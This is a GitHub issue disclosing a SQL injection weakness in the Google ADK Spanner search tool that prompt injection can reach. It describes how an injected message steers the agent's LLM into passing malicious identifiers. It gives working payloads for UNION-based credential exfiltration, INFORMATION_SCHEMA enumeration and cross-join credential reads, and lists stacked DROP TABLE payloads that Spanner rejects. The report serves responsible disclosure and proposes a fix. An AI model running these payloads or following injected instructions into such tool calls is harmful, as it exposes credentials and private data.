Skip to content

Spanner search tool: validate structural SQL identifiers (defense-in-depth for prompt-injection-driven SQLi) #5913

@pk009900

Description

@pk009900

Summary

google.adk.tools.spanner.search_tool interpolates several LLM-controllable
parameters into SQL via f-strings without validation:

  • table_name, columns, embedding_column_to_search, additional_filter,
    top_k in _generate_sql_for_knn / _generate_sql_for_ann
  • spanner_googlesql_embedding_model_name in _generate_googlesql_for_embedding_query
  • vertex_ai_embedding_model_endpoint (inside '...') in
    _generate_postgresql_for_embedding_query

These are not standard untrusted-input SQLi (Spanner's execute_sql is
single-statement; stacked queries fail at parse), but similarity_search is
registered as a GoogleTool in SpannerToolset.get_tools() (spanner_toolset.py:122),
so the LLM populates these parameters at runtime. A successful prompt injection
on the agent's input can lead the LLM to call the tool with malicious values,
enabling single-statement primitives like UNION-based read exfiltration and
INFORMATION_SCHEMA enumeration against any table the service account can SELECT.

Threat model

prompt-injected user message
        │
        ▼
LLM populates similarity_search(table_name=..., columns=..., additional_filter=..., ...)
        │
        ▼
_generate_sql_for_knn renders the values into an f-string SQL template
        │
        ▼
snapshot.execute_sql(sql, params={embedding: ...})  -- structural identifiers unbound

The query parameter is correctly bound (@query / $1), but every structural
identifier above flows in unvalidated.

Reproduction (single-statement primitives that work)

Each example below shows the LLM-emitted tool-call arguments and the resulting
SQL rendered by _generate_sql_for_knn. All three parse as a single Spanner
GoogleSQL statement and exercise the documented surface of similarity_search.

1. UNION-based exfiltration via additional_filter

from google.adk.tools.spanner import search_tool
from google.cloud.spanner_admin_database_v1.types import DatabaseDialect

sql = search_tool._generate_sql_for_knn(
    dialect=DatabaseDialect.GOOGLE_STANDARD_SQL,
    table_name="documents",
    embedding_column_to_search="embedding",
    columns=["content"],
    additional_filter="1=1 UNION ALL SELECT password, 0.0 FROM admin_credentials",
    distance_type="COSINE",
    top_k=10,
)

Rendered SQL:

SELECT content, COSINE_DISTANCE(embedding, @embedding) AS distance
FROM documents
WHERE 1=1 UNION ALL SELECT password, 0.0 FROM admin_credentials
ORDER BY distance
LIMIT 10

UNION ALL operates at the SELECT-statement level; column counts match (2 on
each side); ORDER BY distance binds to the combined result. Any table the
service account can SELECT becomes readable through the search result rows.

2. INFORMATION_SCHEMA enumeration via columns

sql = search_tool._generate_sql_for_knn(
    dialect=DatabaseDialect.GOOGLE_STANDARD_SQL,
    table_name="documents",
    embedding_column_to_search="embedding",
    columns=[
        "(SELECT STRING_AGG(table_name, ',') FROM INFORMATION_SCHEMA.TABLES) AS schema_dump",
        "content",
    ],
    additional_filter=None,
    distance_type="COSINE",
    top_k=1,
)

Rendered SQL:

SELECT (SELECT STRING_AGG(table_name, ',') FROM INFORMATION_SCHEMA.TABLES) AS schema_dump,
       content,
       COSINE_DISTANCE(embedding, @embedding) AS distance
FROM documents
WHERE 1=1
ORDER BY distance
LIMIT 1

A scalar subquery in the SELECT list is valid GoogleSQL. The attacker gets the
full table inventory of the database the agent's SA can see, which makes
follow-up primitive 1 trivially weaponizable across the whole instance.

3. Cross-table read via table_name

sql = search_tool._generate_sql_for_knn(
    dialect=DatabaseDialect.GOOGLE_STANDARD_SQL,
    table_name="documents JOIN admin_credentials ac ON TRUE",
    embedding_column_to_search="embedding",
    columns=["ac.password", "ac.username"],
    additional_filter=None,
    distance_type="COSINE",
    top_k=50,
)

Rendered SQL:

SELECT ac.password, ac.username, COSINE_DISTANCE(embedding, @embedding) AS distance
FROM documents JOIN admin_credentials ac ON TRUE
WHERE 1=1
ORDER BY distance
LIMIT 50

A cross-join multiplies documents rows with every row of admin_credentials,
projecting credentials into the search result regardless of vector similarity.
Works against any pair of tables the service account can SELECT.

What does not work (so reviewers don't have to check)

Stacked queries (;-separated statements) are rejected by Spanner's
execute_sql at parse time, so payloads like LIMIT 10; SELECT * FROM secrets,
...; DROP TABLE users, or MODEL m); SELECT ... FROM INFORMATION_SCHEMA.TABLES
do not execute. DDL via execute_sql is also blocked — DDL goes through
Database.update_ddl. The realistic blast radius is bounded to read primitives
against tables the agent's SA can already SELECT.

Proposed fix

  • Regex-validate identifiers (table, columns, embedding column, GSQL model name)
  • Regex-validate the Vertex AI endpoint format used in the PG literal
  • Reject ;, --, /*, */ in additional_filter and document it as a
    developer-trusted field rather than LLM-controllable
  • Enforce int on top_k inside similarity_search (the dict path; the
    pydantic SpannerVectorStoreSettings path is already type-safe)

Discovered via OSS VRP, bug ID [redact if needed]. Happy to send a PR.

Metadata

Metadata

Assignees

Labels

tools[Component] This issue is related to tools

Type

No fields configured for Bug.

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions